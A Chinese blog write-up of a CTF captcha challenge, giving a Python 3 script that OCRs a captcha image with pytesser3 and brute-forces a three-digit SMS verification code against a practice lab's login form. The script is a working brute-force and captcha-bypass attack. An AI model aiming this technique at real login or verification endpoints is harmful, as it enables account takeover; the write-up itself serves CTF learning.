参考博客:https://blog.csdn.net/gwenchill/article/details/46679621
最近公司有一个ctf比赛需要研究一下简单cctf题,但是有一道验证码题,不论是直接抓包还是,软件模拟都不行,最后看到了该博客中的python程序,决定用这个实现下,谨以此记录。
python版本 3.6.5 ,相关包安装请自行百度。pytesser3适用于python3,PIL通用。
源代码:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests # 调用url、cookie操作 文件操作的库
import sys
import time
from pytesser3 import *
from PIL import Image
sys.setrecursionlimit(10000) #增加系统递归次数
def vcode(pic_url, cookies):
"python验证码识别函数"
r = requests.get(pic_url, cookies=cookies, timeout=10)
with open('vcode.png', 'wb') as pic:
pic.write(r.content)
image = Image.open('vcode.png')
im = image_to_string(image)
# print im
#源程序此部分在我的环境下跑不通,通过调试发现,im变量初始值总有两\n,因此长度为6,而源程序im.replace('\n','') 语句无法达到去除\n的效果,可能是python 3语法有变化,更改相关代码,成功匹配到了。
im = im.replace("\n","")
print(im,len(im),im.isdigit())
if im.isdigit() and len(im) == 4:
return im
else:
return vcode(pic_url, cookies)
cookies = {'saeut': '106.38.37.102', 'PHPSESSID': '12687b2073dc00668c47b2f870214f9d'}
payload = {'username': '13388886666', 'mobi_code': '1000', 'user_code': '2839', 'Login': 'submit'}
# headers = {'user-agent': 'my-app/0.0.1'}
picurl = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'
url = "http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php"
# filename = u"D:/Users/flag.txt"
# fp = open(filename, 'a')
for i in range(100, 999):
print(i)
# wp1 = requests.post(url1, data=payload1, cookies=cookies1, timeout=10)
#responsetxt1 = wp1.content.decode('utf-8')
#print(responsetxt1)
code1 = vcode(picurl, cookies)
# time.sleep(0.01)
payload['user_code'] = code1
payload['mobi_code'] = '%d' % (i)
wp = requests.post(url, data=payload, cookies=cookies, timeout=10) # params=payload get,headers=headers
#print(wp.text)
#print(wp.content)
#获取网页回复字节码内容
#text = wp.content
# text=text[2:len(text)]
# print 'length:%d'%(len(text))
# fp.write(text.encode('utf-8'))
#将字节码转换为字符串
#字节码转换,原程序中是encode,在调试过程中发现无法实现字节码转换,应该也是语法变化。
responsetxt = wp.content.decode('utf-8')
print(responsetxt) #便于查看相关数值。
if '手机' in responsetxt:
print("手机验证码还没发呢") #前期总会出现手机验证码还没发呢错误,程序调试相关代码
else:
if 'error' not in responsetxt:
print('The correct code is:', code1, responsetxt)
break
else:
print('tring code:', i, code1, responsetxt)
print("get flag success")
图片中flag即为获取的flag值。